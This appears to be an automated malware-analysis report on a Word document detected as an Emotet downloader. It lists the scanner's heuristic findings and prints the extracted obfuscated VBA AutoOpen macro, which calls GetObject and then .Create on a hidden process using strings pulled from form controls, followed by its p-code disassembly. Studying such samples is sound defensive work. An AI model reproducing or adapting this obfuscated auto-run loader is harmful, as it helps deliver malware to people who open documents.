Verdict: MALICIOUS
Risk Score: 190
Heuristics: 7
- ClamAV: Doc.Downloader.Emotet-6911245-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6911245-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `Set QxDxD4 = GetObject(CABcADw.lxcAwA_o.Value + cxxAUB.SXXBxU + CABcADw.lxcAwA_o.Value)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub autoopen()`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12325 bytes | 8891af3983240922e47ffbef02c377e6484848fadeca0274af6a1be97d67258b |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "JwXoAQ_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "CABcADw"
Attribute VB_Base = "0{2F4A92F4-7920-4395-8121-3819BD775A5F}{DA041100-F338-4CA2-99E9-D1F4C96EAFD2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "cxxAUB"
Attribute VB_Base = "0{9BBEB43E-9D26-4546-A9EA-89765F523487}{2F1B9831-D801-4165-A303-DD05E5AE952A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "jQ1CUA"
Sub autoopen()
On Error Resume Next
Select Case TDcUwB_A
Case 94093231
BAACAC = jkAQ4Q / 316178787 / lA4AG_c - CInt(jQQBxA + CInt(940402362)) + (112466118 * CLng(759412863))
k1UDX1 = 871096539 * TCAZCQAG
SAUGAAA = 850208196 - 102605471 + 279924446 - AAxAAAw / iAAAG41 - Tan(868677367)
End Select
Select Case UABAUAxU
Case 771334385
dAAAAxA = PAZAcxCQ / 87756701 / VDAwQ_Aw - CInt(HxA1AZA + CInt(694492707)) + (289790215 * CLng(907910442))
rADAkA = 383565605 * fAQCwXC
sDUAA14 = 448871441 - 672645496 + 512474701 - pA_DQAkC / rAAQXDA - Tan(106333700)
End Select
Set QxDxD4 = GetObject(CABcADw.lxcAwA_o.Value + cxxAUB.SXXBxU + CABcADw.lxcAwA_o.Value)
Select Case iAZxGGcQ
Case 511402885
zoQA4Q = qDAACCA / 674067476 / H1UcXAD - CInt(rGAAA1 + CInt(641783563)) + (424219774 * CLng(850075319))
IoxABUA = 730308029 * nxAXDU
jDADAA = 769191566 - 61001637 + 225429506 - PQAxZX / NAAcDc - Tan(36609240)
End Select
Select Case w1AAB1
Case 938996945
CCBUAABx = NAoAQU_A / 432186703 / vAUX1AA - CInt(fQAkQDx + CInt(970228400)) + (734741916 * CLng(778866916))
EQAQDcxx = 91218929 * U4k1Xw4
aow_oA = 550767162 - 405975222 + 698993827 - hGAAkCA / Q__B1DZ - Tan(631320408)
End Select
QxDxD4.ShowWindow = 584849 - 584849
Select Case uBXUDC
Case 200802316
pADZ1_B = zQUD1BB / 682685158 / b4QAU4A1 - CInt(BAwAAXAA + CInt(689408129)) + (432751950 * CLng(700658431))
wAcAQ14k = 685405474 * OAxAUA
PAAAAo = 204454242 - 106970279 + 759845641 - nAZUQAAc / zBDAoQkA - Tan(563042852)
End Select
Select Case ooQUB4DU
Case 587639863
LDAwAB_ = Akx14UA / 388821129 / WAUA1DA - CInt(i1DAQ1B + CInt(892449217)) + (302744860 * CLng(561742236))
JwXAGoA = 125265344 * wACAUZ
IxkDwAA_ = 234501768 - 972172313 + 738874835 - rAAAAQ / JD4AUAw - Tan(688759290)
End Select
Select Case SD1xAAQA
Case 180521468
VAAcU1U = hQUAo_QA / 948914106 / dABUAAAx - CInt(u4BAxD + CInt(828975253)) + (241921069 * CLng(191312248))
uA1BCAk = 964555209 * PGwD4BB
dUUQAAA = 912948566 - 884963151 + 84617047 - n_AGQ1 / D4A1U4 - Tan(934729022)
End Select
GetObject(CABcADw.lxcAwA_o.Value + cxxAUB.ioAACAkA + CABcADw.lxcAwA_o.Value) _
.Create CABcADw.lxcAwA_o.Value + cxxAUB.sA_ABCA + CABcADw.lxcAwA_o.Value + cxxAUB.PAccAZA + CABcADw.lxcAwA_o.Value + CABcADw.lxcAwA_o.Value + cxxAUB.DAB4UD4x + CABcADw.lxcAwA_o.Value + CABcADw.lxcAwA_o.Value + cxxAUB.wXBCQQcQ + CABcADw.lxcAwA_o.Value + cxxAUB.WBBkDAD + CABcADw.lxcAwA_o.Value, p11A_AZ, QxDxD4, CABcADw.lxcAwA_o.Value
Select Case WAADADDA
Case 84187356
EUZCAQ = sAA_ZB / 401748745 / wAokAQcD - CInt(YUCAAQ1B + CInt(363931290)) + (607366488 * CLng(610813707))
rcQQUCAA = 497919692 * nBDDQXZ
doQA4A = 934018432 - 192932249 + 976246952 - JxUAAQQ / kAcADGD - Tan(154565724)
End Select
Select Case h_A4DA
Case 602816447
NwQGAB4 = fDZxAAQ / 587414036 / cZACDBD - CInt(dGZ_BkD + CInt(85405195)) + (991209687 * CLng(170160589))
sBA1AGAX = 584870255 * ZX4B_1X
PxCGk4C = 907524586 - 921508450 + 85177870 - i_UCAGx / DxAAcACA - Tan(882699820)
End Select
End Sub
' Processing file: /opt/analyzer/scan_staging/efb8f68a348e49df883b17a6ebd0d773.bin
' ===============================================================================
' Module streams:
' Macros/VBA/JwXoAQ_ - 1105 bytes
' Macros/VBA/CABcADw - 1158 bytes
' Macros/VBA/cxxAUB - 1157 bytes
' Macros/VBA/jQ1CUA - 5459 bytes
' Line #0:
' FuncDefn (Sub jQ1CUA())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld autoopen
' SelectCase
' Line #3:
' LitDI4 0xBFAF 0x059B
' Case
' CaseDone
' Line #4:
' Ld BAACAC
' LitDI4 0x8163 0x12D8
' Div
' Ld jkAQ4Q
' Div
' Ld lA4AG_c
' LitDI4 0x66BA 0x380D
' Coerce (Int)
' Add
' Coerce (Int)
' Sub
' LitDI4 0x18C6 0x06B4
' LitDI4 0xB87F 0x2D43
' Coerce (Lng)
' Mul
' Paren
' Add
' St TDcUwB_A
' Line #5:
' LitDI4 0xE0DB 0x33EB
' Ld k1UDX1
' Mul
' St jQQBxA
' Line #6:
' LitDI4 0x25C4 0x32AD
' LitDI4 0xA29F 0x061D
' Sub
' LitDI4 0x4EDE 0x10AF
' Add
' Ld SAUGAAA
' Ld AAxAAAw
' Div
' Sub
' LitDI4 0xF6F7 0x33C6
' ArgsLd Tan 0x0001
' Sub
' St TCAZCQAG
' Line #7:
' EndSelect
' Line #8:
' Ld iAAAG41
' SelectCase
' Line #9:
' LitDI4 0xA0F1 0x2DF9
' Case
' CaseDone
' Line #10:
' Ld dAAAAxA
' LitDI4 0x0F9D 0x053B
' Div
' Ld PAZAcxCQ
' Div
' Ld VDAwQ_Aw
' LitDI4 0x1E23 0x2965
' Coerce (Int)
' Add
' Coerce (Int)
' Sub
' LitDI4 0xD907 0x1145
' LitDI4 0x9D2A 0x361D
' Coerce (Lng)
' Mul
' Paren
' Add
' St UABAUAxU
' Line #11:
' LitDI4 0xBF25 0x16DC
' Ld rADAkA
' Mul
' St HxA1AZA
' Line #12:
' LitDI4 0x3C11 0x1AC1
' LitDI4 0xC178 0x2817
' Sub
' LitDI4 0xBE4D 0x1E8B
' Add
' Ld sDUAA14
' Ld pA_DQAkC
' Div
' Sub
' LitDI4 0x8604 0x0656
' ArgsLd Tan 0x0001
' Sub
' St fAQCwXC
' Line #13:
' EndSelect
' Line #14:
' SetStmt
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Ld MSForms
' MemLd Value
' Add
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Add
' ArgsLd QxDxD4 0x0001
' Set rAAQXDA
' Line #15:
' Ld SXXBxU
' SelectCase
' Line #16:
' LitDI4 0x6385 0x1E7B
' Case
' CaseDone
' Line #17:
' Ld zoQA4Q
' LitDI4 0x7414 0x282D
' Div
' Ld qDAACCA
' Div
' Ld H1UcXAD
' LitDI4 0xD70B 0x2640
' Coerce (Int)
' Add
' Coerce (Int)
' Sub
' LitDI4 0x147E 0x1949
' LitDI4 0x1EB7 0x32AB
' Coerce (Lng)
' Mul
' Paren
' Add
' St iAZxGGcQ
' Line #18:
' LitDI4 0x9DBD 0x2B87
' Ld IoxABUA
' Mul
' St rGAAA1
' Line #19:
' LitDI4 0xEE8E 0x2DD8
' LitDI4 0xCFA5 0x03A2
' Sub
' LitDI4 0xC802 0x0D6F
' Add
' Ld jDADAA
' Ld PQAxZX
' Div
' Sub
' LitDI4 0x9CD8 0x022E
' ArgsLd Tan 0x0001
' Sub
' St nxAXDU
' Line #20:
' EndSelect
' Line #21:
' Ld NAAcDc
' SelectCase
' Line #22:
' LitDI4 0xF4D1 0x37F7
' Case
' CaseDone
' Line #23:
' Ld CCBUAABx
' LitDI4 0xA54F 0x19C2
' Div
' Ld NAoAQU_A
' Div
' Ld vAUX1AA
' LitDI4 0x82B0 0x39D4
' Coerce (Int)
' Add
' Coerce (Int)
' Sub
' LitDI4 0x459C 0x2BCB
' LitDI4 0x90E4 0x2E6C
' Coerce (Lng)
' Mul
' Paren
' Add
' St w1AAB1
' Line #24:
' LitDI4 0xE3F1 0x056F
' Ld EQAQDcxx
' Mul
' St fQAkQDx
' Line #25:
' LitDI4 0x0A3A 0x20D4
' LitDI4 0xB0B6 0x1832
' Sub
' LitDI4 0xCCA3 0x29A9
' Add
' Ld aow_oA
' Ld hGAAkCA
' Div
' Sub
' LitDI4 0x2F58 0x25A1
' ArgsLd Tan 0x0001
' Sub
' St U4k1Xw4
' Line #26:
' EndSelect
' Line #27:
' LitDI4 0xEC91 0x0008
' LitDI4 0xEC91 0x0008
' Sub
' Ld rAAQXDA
' MemSt Q__B1DZ
' Line #28:
' Ld ShowWindow
' SelectCase
' Line #29:
' LitDI4 0x000C 0x0BF8
' Case
' CaseDone
' Line #30:
' Ld pADZ1_B
' LitDI4 0xF2E6 0x28B0
' Div
' Ld zQUD1BB
' Div
' Ld b4QAU4A1
' LitDI4 0x8881 0x2917
' Coerce (Int)
' Add
' Coerce (Int)
' Sub
' LitDI4 0x454E 0x19CB
' LitDI4 0x32FF 0x29C3
' Coerce (Lng)
' Mul
' Paren
' Add
' St uBXUDC
' Line #31:
' LitDI4 0x7522 0x28DA
' Ld wAcAQ14k
' Mul
' St BAwAAXAA
' Line #32:
' LitDI4 0xB962 0x0C2F
' LitDI4 0x3CA7 0x0660
' Sub
' LitDI4 0x5309 0x2D4A
' Add
' Ld PAAAAo
' Ld nAZUQAAc
' Div
' Sub
' LitDI4 0x5A24 0x218F
' ArgsLd Tan 0x0001
' Sub
' St OAxAUA
' Line #33:
' EndSelect
' Line #34:
' Ld zBDAoQkA
' SelectCase
' Line #35:
' LitDI4 0xAC37 0x2306
' Case
' CaseDone
' Line #36:
' Ld LDAwAB_
' LitDI4 0xF089 0x172C
' Div
' Ld Akx14UA
' Div
' Ld WAUA1DA
' LitDI4 0xB1C1 0x3531
' Coerce (Int)
' Add
' Coerce (Int)
' Sub
' LitDI4 0x851C 0x120B
' LitDI4 0x819C 0x217B
' Coerce (Lng)
' Mul
' Paren
' Add
' St ooQUB4DU
' Line #37:
' LitDI4 0x65C0 0x0777
' Ld JwXAGoA
' Mul
' St i1DAQ1B
' Line #38:
' LitDI4 0x3688 0x0DFA
' LitDI4 0x2C19 0x39F2
' Sub
' LitDI4 0x55D3 0x2C0A
' Add
' Ld IxkDwAA_
' Ld rAAAAQ
' Div
' Sub
' LitDI4 0xA1FA 0x290D
' ArgsLd Tan 0x0001
' Sub
' St wACAUZ
' Line #39:
' EndSelect
' Line #40:
' Ld JD4AUAw
' SelectCase
' Line #41:
' LitDI4 0x89FC 0x0AC2
' Case
' CaseDone
' Line #42:
' Ld VAAcU1U
' LitDI4 0x47BA 0x388F
' Div
' Ld hQUAo_QA
' Div
' Ld dABUAAAx
' LitDI4 0x2895 0x3169
' Coerce (Int)
' Add
' Coerce (Int)
' Sub
' LitDI4 0x6C2D 0x0E6B
' LitDI4 0x3178 0x0B67
' Coerce (Lng)
' Mul
' Paren
' Add
' St SD1xAAQA
' Line #43:
' LitDI4 0xF1C9 0x397D
' Ld uA1BCAk
' Mul
' St u4BAxD
' Line #44:
' LitDI4 0x7D56 0x366A
' LitDI4 0x774F 0x34BF
' Sub
' LitDI4 0x2757 0x050B
' Add
' Ld dUUQAAA
' Ld n_AGQ1
' Div
' Sub
' LitDI4 0xD53E 0x37B6
' ArgsLd Tan 0x0001
' Sub
' St PGwD4BB
' Line #45:
' EndSelect
' Line #46:
' LineCont 0x0004 12 00 00 00
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Ld MSForms
' MemLd Create
' Add
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Add
' Ld MSForms
' MemLd sA_ABCA
' Add
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Add
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Add
' Ld MSForms
' MemLd PAccAZA
' Add
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Add
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Add
' Ld MSForms
' MemLd DAB4UD4x
' Add
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Add
' Ld MSForms
' MemLd wXBCQQcQ
' Add
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Add
' Ld WBBkDAD
' Ld rAAQXDA
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Ld MSForms
' MemLd D4A1U4
' Add
' Ld cxxAUB
' MemLd GetObject
' MemLd lxcAwA_o
' Add
' ArgsLd QxDxD4 0x0001
' ArgsMemCall ioAACAkA 0x0004
' Line #47:
' Ld p11A_AZ
' SelectCase
' Line #48:
' LitDI4 0x98DC 0x0504
' Case
' CaseDone
' Line #49:
' Ld EUZCAQ
' LitDI4 0x3309 0x17F2
' Div
' Ld sAA_ZB
' Div
' Ld wAokAQcD
' LitDI4 0x269A 0x15B1
' Coerce (Int)
' Add
' Coerce (Int)
' Sub
' LitDI4 0xAD58 0x2433
' LitDI4 0x470B 0x2468
' Coerce (Lng)
' Mul
' Paren
' Add
' St WAADADDA
' Line #50:
' LitDI4 0xA6CC 0x1DAD
' Ld rcQQUCAA
' Mul
' St YUCAAQ1B
' Line #51:
' LitDI4 0xFD80 0x37AB
' LitDI4 0xE999 0x0B7F
' Sub
' LitDI4 0x58A8 0x3A30
' Add
' Ld doQA4A
' Ld JxUAAQQ
' Div
' Sub
' LitDI4 0x7C5C 0x0936
' ArgsLd Tan 0x0001
' Sub
' St nBDDQXZ
' Line #52:
' EndSelect
' Line #53:
' Ld kAcADGD
' SelectCase
' Line #54:
' LitDI4 0x3FBF 0x23EE
' Case
' CaseDone
' Line #55:
' Ld NwQGAB4
' LitDI4 0x3A14 0x2303
' Div
' Ld fDZxAAQ
' Div
' Ld cZACDBD
' LitDI4 0x2E0B 0x0517
' Coerce (Int)
' Add
' Coerce (Int)
' Sub
' LitDI4 0xA8D7 0x3B14
' LitDI4 0x71CD 0x0A24
' Coerce (Lng)
' Mul
' Paren
' Add
' St h_A4DA
' Line #56:
' LitDI4 0x696F 0x22DC
' Ld sBA1AGAX
' Mul
' St dGZ_BkD
' Line #57:
' LitDI4 0xB9EA 0x3617
' LitDI4 0x1A62 0x36ED
' Sub
' LitDI4 0xB60E 0x0513
' Add
' Ld PxCGk4C
' Ld i_UCAGx
' Div
' Sub
' LitDI4 0xEE2C 0x349C
' ArgsLd Tan 0x0001
' Sub
' St ZX4B_1X
' Line #58:
' EndSelect
' Line #59:
' EndSub
' Line #60: